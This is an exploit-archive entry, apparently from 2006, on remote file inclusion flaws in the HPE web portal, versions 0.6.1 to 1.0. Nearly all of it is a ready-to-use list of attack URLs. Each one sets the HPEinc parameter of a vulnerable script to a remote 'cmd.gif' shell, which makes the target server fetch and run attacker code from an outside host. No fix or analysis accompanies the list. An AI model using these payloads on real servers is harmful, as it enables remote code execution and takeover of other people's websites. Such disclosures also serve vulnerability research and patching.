HPE <= 1.0 (HPEinc) Remote File Include Vulnerabilities (updated)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HPE <= 1.0 (HPEinc) Remote File Include Vulnerabilities (updated)
# Published : 2006-08-22
# Author : the master
# Previous Title : Empire CMS <= 3.7 (checklevel.php) Remote File Include Vulnerability
# Next Title : Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit

########################################################################
#  HPE v0.6.1  Remote File Inclusion Vulnerability
#
#  Download: http://prdownloads.sourceforge.net/hpe/hpe-1.0.zip?download
#  Download: http://prdownloads.sourceforge.net/hpe/HPE-0.7.0.tar.gz?download
#  Download: http://prdownloads.sourceforge.net/hpe/HPE-0.6.5.tar.gz?download
#  Download: http://prdownloads.sourceforge.net/hpe/HPE-0.6.1.tar.gz?download
#
#  Found By: the master
#
########################################################################

1.0
#  http://[Target]/[Path]/HPE/lang/de.php?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/lang/fr.php?HPEinc=http://cmd.gif?
##############################################################################

0.7.0
#  http://[Target]/[Path]/HPE/clickerr.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/loadcatnews.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/motd.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/mod.newslog.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/thememaker.php3?HPEinc=http://cmd.gif?
##############################################################################

0.6.5
#  http://[Target]/[Path]/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.newnews.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.randnews.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.teaser.show.php3?HPEinc=http://cmd.gif?
###############################################################################

0.6.1
#  http://[Target]/[Path]/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
#  http://[Target]/[Path]/HPE/thememaker.php3?HPEinc=http://cmd.gif?
###############################################################################

# www.Syue.com [2006-08-22]